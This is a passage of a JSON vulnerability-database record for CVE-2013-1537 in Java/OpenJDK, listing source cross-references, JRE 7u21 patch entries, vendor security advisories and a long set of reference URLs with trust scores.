"CVE-2013-1537", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123734", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121631", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121703", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "123735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121555", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "121361", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "BID", "id": "59194" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "121631" }, { "db": "PACKETSTORM", "id": "121703" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "121555" }, { "db": "PACKETSTORM", "id": "121361" }, { "db": "CNNVD", "id": "CNNVD-201304-359" }, { "db": "NVD", "id": "CVE-2013-1537" } ] }, "id": "VAR-201304-0300", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 1.0 }, "last_update_date": "2024-07-23T21:35:11.273000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "jre-7u21-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45704" }, { "title": "jre-7u21-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45708" }, { "title": "jre-7u21-solaris-sparcv9", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45712" }, { "title": "jre-7u21-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45716" }, { "title": "jre-7u21-linux-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45703" }, { "title": "jre-7u21-macosx-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45707" }, { "title": "jre-7u21-solaris-sparc", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45711" }, { "title": "jre-7u21-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45715" }, { "title": "jre-7u21-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45706" }, { "title": "jre-7u21-solaris-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45710" }, { "title": "jre-7u21-windows-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45714" }, { "title": "jre-7u21-linux-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45705" }, { "title": "jre-7u21-solaris-i586", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45709" }, { "title": "jre-7u21-windows-i586-iftw", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45713" }, { "title": "jre-7u21-windows-x64", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=45717" }, { "title": "Red Hat: CVE-2013-1537", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2013-1537" }, { "title": "Red Hat: Important: java-1.6.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130770 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130751 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-ibm security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130823 - security advisory" }, { "title": "Red Hat: Critical: java-1.6.0-sun security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130758 - security advisory" }, { "title": "Red Hat: Important: java-1.7.0-openjdk security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130752 - security advisory" }, { "title": "Red Hat: Critical: java-1.7.0-oracle security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20130757 - security advisory" }, { "title": "Ubuntu Security Notice: openjdk-7 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1806-1" }, { "title": "Ubuntu Security Notice: openjdk-6 vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1819-1" }, { "title": "Amazon Linux AMI: ALAS-2013-185", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-185" }, { "title": "Amazon Linux AMI: ALAS-2013-183", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2013-183" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131456 - security advisory" }, { "title": "Red Hat: Low: Red Hat Network Satellite server IBM Java Runtime security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20131455 - security advisory" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "CNNVD", "id": "CNNVD-201304-359" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2013-1537" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html" }, { "trust": 2.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=952387" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1455.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2013-1456.html" }, { "trust": 1.8, "url": "https://wiki.mageia.org/en/support/advisories/mgasa-2013-0124" }, { "trust": 1.8, "url": "http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-april/022796.html" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/59194" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-1806-1" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-0752.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-0758.html" }, { "trust": 1.7, "url": "http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/096ed306159f" }, { "trust": 1.7, "url": "http://blog.fuseyism.com/index.php/2013/04/25/security-icedtea-1-11-11-1-12-5-for-openjdk-6-released/" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00013.html" }, { "trust": 1.7, "url": "http://blog.fuseyism.com/index.php/2013/04/22/security-icedtea-2-3-9-for-openjdk-7-released/" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2013-0757.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2013-05/msg00017.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/java/javase/7u21-relnotes-1932873.html#rmichanges" }, { "trust": 1.7, "url": "http://www.security-explorations.com/en/se-2012-01-details.html" }, { "trust": 1.7, "url": "http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/f098e2297ff1" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-05/msg00007.html" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2013/feb/18" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-updates/2013-06/msg00099.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00001.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-06/msg00007.html" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=137283787217316\u0026w=2" }, { "trust": 1.7, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03898880" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:150" }, { "trust": 1.7, "url": "http://www.us-cert.gov/ncas/alerts/ta13-107a" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2013/apr/msg00001.html" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:145" }, { "trust": 1.7, "url": "https://wiki.mageia.org/en/support/advisories/mgasa-2013-0130" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2013:161" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19550" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a19385" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a16578" }, { "trust": 0.6, "url": "https://downloads.avaya.com/css/p8/documents/100172168" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2419.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-0401.html" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1569.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1557.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2429.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1537.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2432.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-1491.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2383.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2424.html" }, { "trust": 0.4, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1569" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0401" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2420" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2383" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1557" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2384" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2430" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2429" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2419" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1537" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2417" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10627" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10642\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#oracle_april_16_2013_cpu" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21649510" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640058" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034690" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24034225" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-213-02" }, { "trust": 0.3, "url": "http://prod.lists.apple.com/archives/security-announce/2013/apr/msg00001.html" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?docid=emr_na-c03909126-1" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04126444" }, { "trust": 0.3, "url": "http://alerts.hp.com/r?2.1.3kt.2zr.xg7ek.jz8iz8..t.d3wy.82bm.bw89mq%5f%5fcviafmb0" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs13-010/index.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001531" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640206" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21637512" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640420" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100172158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21640763" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645096" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645100" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643544" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21649300" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21647384" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21643697" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642358" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004513" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21649318" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643618" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643513" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21645425" }, { "trust": 0.3, "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00001.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1540.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2422.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2435.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2418.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-1563.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2433.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2424" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2422" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2468.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1476.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2463.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2446.html" }, { "trust": 0.2, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1500.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0428.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1480.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2444.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0425.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5089.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1722.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5079.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0419.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1721.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5081.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0409.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5071.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0423.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1532.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3216.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5069.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5084.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0443.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0809.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1487.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0351.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4820.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0427.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0433.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1493.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5073.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4823.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2456.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2407.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2470.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5068.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1541.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-4822.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3159.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5075.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2471.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2443.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1713.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3213.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0441.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2457.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2412.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5072.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1718.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0432.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0446.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1481.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1717.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1531.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2447.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2452.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0450.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1571.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1473.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0547.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2465.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2472.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1716.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-5083.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1491" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169" }, { "trust": 0.2, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2394" }, { "trust": 0.2, "url": "https://access.redhat.com/knowledge/articles/11258" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2432" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1518" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2431" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2421" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2426" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1488" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2415" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2013-1537" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1806-1/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0873.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3548.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3521" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3556.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3563.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3546" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0497.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0500.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3561.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0863.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0499.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0862" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0867.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0507.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3552.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0814.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3547.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3549" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0503.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3554.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3549.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3553" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3516.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0871.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3554" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-0868.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3389" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0873" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3548" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2011-3521.html" }, { "trust": 0.1, "url": 